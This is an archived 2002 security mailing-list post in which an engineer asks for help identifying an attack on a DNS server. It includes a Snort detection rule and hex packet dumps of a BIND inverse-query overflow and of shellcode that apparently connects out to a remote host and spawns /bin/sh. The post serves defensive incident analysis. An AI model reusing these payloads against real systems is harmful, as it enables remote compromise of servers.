unidentified DNS attack

From: David Wilburn (dwilburnat_private)
Date: Tue Jan 08 2002 - 13:08:02 PST

Next message: leon: "how often do 0-days REALLY happen?"

Previous message: Gideon Lenkey: "RE: Spoofed scans"
Next in thread: quentynat_private: "Re: unidentified DNS attack"
Reply: quentynat_private: "Re: unidentified DNS attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Sunday January 6th at about 12:18PM (EST), Snort picked up some
malicious traffic from a Chinese source address to one of our DNS
servers.  It looks like a tool was launched against us that first does a
version query, and then launches a couple of attacks, one of which
exploits the inverse query vulnerability (CVE-1999-0009), and another
that I cannot identify.  We have no records of any scans from this
particular source IP.

The unidentified exploit was caught by Snort's statdx RPC rule.  One
possibility is that the shell code for this exploit was ripped from
another exploit, possibly the statdx exploit.  Here's the rule that got
triggered.

alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"RPC EXPLOIT statdx";
content: "/bin|c74604|/sh";reference:arachnids,442;
classtype:attempted-admin; sid:1282; rev:1;)

The packet dumps from Snort are pasted below.  All times are in EST. 
The destination IP has been cleaned.

So, am I looking at some 0-day exploit here, or is this something that
somebody recognizes?  Any idea what vulnerability this would be
attempting to exploit?

-Dave Wilburn
Infosec Engineer/Scientist
The MITRE Corporation

[**] DNS named version attempt [**]
01/06-12:18:22.735569 202.96.242.117:3951 -> XXX.XXX.XXX.XXX:53
UDP TTL:41 TOS:0x0 ID:35630 IpLen:20 DgmLen:58
Len: 38
23 BF 00 00 00 01 00 00 00 00 00 00 07 76 65 72  #............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03        sion.bind.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] DNS named iquery attempt [**]
01/06-12:18:23.024562 202.96.242.117:3951 -> XXX.XXX.XXX.XXX:53
UDP TTL:41 TOS:0x0 ID:35962 IpLen:20 DgmLen:493
Len: 473
23 BF 09 80 00 00 00 01 00 00 00 00 3E 41 41 41  #...........>AAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 3E 42 42 42 42  AAAAAAAAAAA>BBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 3E 43 43 43 43 43  BBBBBBBBBB>CCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 3E 00 01 02 03 04 05  CCCCCCCCC>......
06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15  ................
16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25  .......... !"#$%
26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35  &'()*+,-./012345
36 37 38 39 3A 3B 3C 3D 3E 45 45 45 45 45 45 45  6789:;<=>EEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 3E 46 46 46 46 46 46 46 46  EEEEEEE>FFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 3D 47 47 47 47 47 47 47 47 47  FFFFFF=GGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 00 00 01 00 01 00 00 00 01 00 FF 40  GGGG...........@
66                                               f

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] RPC EXPLOIT statdx [**]
01/06-12:18:23.312228 202.96.242.117:3951 -> XXX.XXX.XXX.XXX:53
UDP TTL:41 TOS:0x0 ID:35966 IpLen:20 DgmLen:538
Len: 518
23 BF 00 00 00 01 00 00 00 00 00 01 3C 90 89 E6  #...........<...
83 C6 40 C7 06 02 00 0B AC C7 46 04 97 C4 47 A0  ..@.......F...G.
31 C0 89 46 08 89 46 0C 31 C0 89 46 28 40 89 46  1..F..F.1..F(@.F
24 40 89 46 20 8D 4E 20 31 DB 43 31 C0 83 C0 66  $@.F .N 1.C1...f
51 53 50 CD 80 89 46 20 90 3C 90 8D 06 89 46 24  QSP...F .<....F$
31 C0 83 C0 10 89 46 28 58 5B 59 43 43 FF 76 20  1.....F(X[YCC.v 
CD 80 5B 4F 74 32 8B 04 24 89 46 08 90 BD CA 60  ..[Ot2..$.F....`
F2 75 89 6E 04 C7 06 03 80 35 86 B8 04 00 00 00  .u.n.....5......
8D 0E 31 D2 83 C2 0C CD 80 C7 06 02 00 61 BD 89  ..1..........a..
6E 04 90 31 FF 47 EB 88 90 31 C0 83 C0 3F 31 C9  n..1.G...1...?1.
50 CD 80 58 41 CD 80 C7 06 2F 62 69 6E C7 46 04  P..XA..../bin.F.
2F 73 68 00 89 F0 83 C0 08 89 46 08 31 C0 89 46  /sh.......F.1..F
0C B0 0B 8D 56 0C 8D 4E 08 89 F3 CD 80 31 C0 40  ....V..N.....1.@
CD 80 3E 41 41 41 41 41 41 41 41 41 41 41 41 41  ..>AAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 3E 42 42 42 42 42 42 42 42 42 42 42 42 42 42  A>BBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
03 43 43 43 10 06 00 00 00 B7 FD FF FF E3 FF FF  .CCC............
FF 00 FF FF FF 3E 41 41 41 41 41 41 41 41 41 41  .....>AAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 3E 42 42 42 42 42 42 42 42 42 42 42  AAAA>BBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 10 43 43 43 43 43 43 43 43 43 43 43 43  BBB.CCCCCCCCCCCC
43 43 43 43 00 00 01 00 01 00 00 FA 00 FF        CCCC..........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: leon: "how often do 0-days REALLY happen?"
Previous message: Gideon Lenkey: "RE: Spoofed scans"
Next in thread: quentynat_private: "Re: unidentified DNS attack"
Reply: quentynat_private: "Re: unidentified DNS attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jan 08 2002 - 14:44:15 PST